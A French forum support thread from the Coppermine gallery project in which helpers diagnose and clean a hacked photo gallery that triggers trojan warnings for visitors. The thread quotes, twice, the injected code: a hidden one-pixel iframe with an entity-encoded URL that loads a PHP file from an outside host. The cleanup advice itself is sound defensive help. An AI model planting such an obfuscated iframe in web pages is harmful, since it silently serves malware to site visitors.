[Solved]: problème de virus [Solved]: problème de virus
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

[Solved]: problème de virus

Started by soraya95610, April 21, 2008, 03:02:48 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

soraya95610

Bonjour ,

J'ai certains des utilisateurs de ma galerie qui ce plaigne d'avoir un virus cheval de troyes quand ils vont sur le site j'ai fais un scan avec le cure mais il n'y a aucun virus dans la galerie  :-\

voilà ma galerie

http://wentworthearlmiller.free.fr/site%20interne/wentworthearlmiller/

Pascal YAP

Au risque de vous faire paniquer, ouvrez le code source de votre page d'accueil, allez jusqu'à la ligne 13, vous lirez ceci :
<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>
C'est justement le code injecté partout sur toutes les pages de votre site  ???

Fermez votre Galerie, Faites un gros nettoyage.
Vérifiez également que des fichiers non téléchargés par vous ne soient pas dans les dossiers Albums (et sous-dossiers) (ZIP ou JPG)

Et installez de nouveau la version1.4.18



François Keller

le fichier cure.php n'arrive pas toujours à tout trouver.
Je regardez le répertoire albums ainsi que les fichiers que vous n'avez pas réuloadé (config.inc, fichiers du theme etc...)
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

soraya95610

Quote from: Pascal YAP on April 21, 2008, 03:28:54 PM
Au risque de vous faire paniquer, ouvrez le code source de votre page d'accueil, allez jusqu'à la ligne 13, vous lirez ceci :
<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>
C'est justement le code injecté partout sur toutes les pages de votre site  ???

Fermez votre Galerie, Faites un gros nettoyage.
Vérifiez également que des fichiers non téléchargés par vous ne soient pas dans les dossiers Albums (et sous-dossiers) (ZIP ou JPG)

Et installez de nouveau la version1.4.18




Merci alors je trouve ou le code source ? une fois avoir trouvé la ligne 13 je supprime ? et enfin comment faire le nettoyage ?

J'ai installé la version 1.4.18 samedi il faut le refaire ?

désolé de vous embêtez avec mes questions

Pascal YAP

QuoteJ'ai installé la version 1.4.18 samedi il faut le refaire ?
Oui, après avoir scrupuleusement scruté le contenu de vos Albums.

soraya95610

Quote from: Pascal YAP on April 21, 2008, 04:57:25 PM
Oui, après avoir scrupuleusement scruté le contenu de vos Albums.

Quand je regarde mes albums je regarde dans filezilla ?

soraya95610

Dans userpics j'ai un fichier vide dummy c'est quoi et un 1001 et deux images  :-\

Pascal YAP

Le code infectant est parfois nommé avec un extension .JPG
Ces images sont-elles à vous !
Si tel n'est pas le cas, inutile de vous dire de les supprimer  ;D

PYAP

François Keller

QuoteDans userpics j'ai un fichier vide dummy c'est quoi
c'est un fichier coppermine, normal qu'il soit vide (il sert pour stocker les fichiers temporaires)
Quote1001 et deux images
c'est le sous répertoire d'upload via html (celui de l'admin à priori) les images qui sont dedans sont soit celles que vous avez téléchargé, sinon, effacez les.
QuoteMerci alors je trouve ou le code source ? une fois avoir trouvé la ligne 13 je supprime ? et enfin comment faire le nettoyage ?
il faut trouver le ou les fichiers qui contiennent le virus:
*remplacez tous les fichiers coppermine (sauf le répertoire albums, le fichier include/config.inc.php, et les fichiers de votre theme) par des fichier propres (version 1.4.18)
*ouvrez avec un éditeur de texte (notepad par exemple) un à un les fichiers que vous n'avez pas remplacé (ceux cités plus haut) et cherchez la ligne incriminée (elle commence par <iframe>) et effacez là. elle peut se trouver dans plusieurs fichiers.
*vérifiez dans le répertoire albums qu'il n'y a pas de fichiers qui ne vous disent rien (fichier .zip ou .jpg avec un nom bizarre (des chiffres en regle générale)) et effacez les le cas échéans.
*lancez le fichier update.php
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

soraya95610

J'ai supprimé ces images mais la ligne est toujours là je vérifie avec filezilla tout mes dossiers mais y a rien de suspect sérieux la je comprends pas

Pascal YAP

Quotesauf le répertoire albums, le fichier include/config.inc.php,
Le code peut s'installer ici aussi, c'est une calamité.
Il s'installe même dans les HTML, d'où une vigilance maximum nécessaire.

Relisez le Post de François, vous n'allez pas avancer sinon  ???

PYAP

soraya95610

Ah j'ai supprimé le virus parfait il était dans le fichier 1100 merci encore pour tout

Pascal YAP

QuoteAh j'ai supprimé le virus parfait il était dans le fichier 1100 merci encore pour tout
Vous parlez sans doute de CONFIG.INC.PHP ?
On ne désespère jamais  ;D

PYAP

François Keller

non je pense qu'il s'agit du sous répertoire 1100 du dossier albums
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

soraya95610

Oui François Keller c'est celui la il était en jpg donc difficile à voir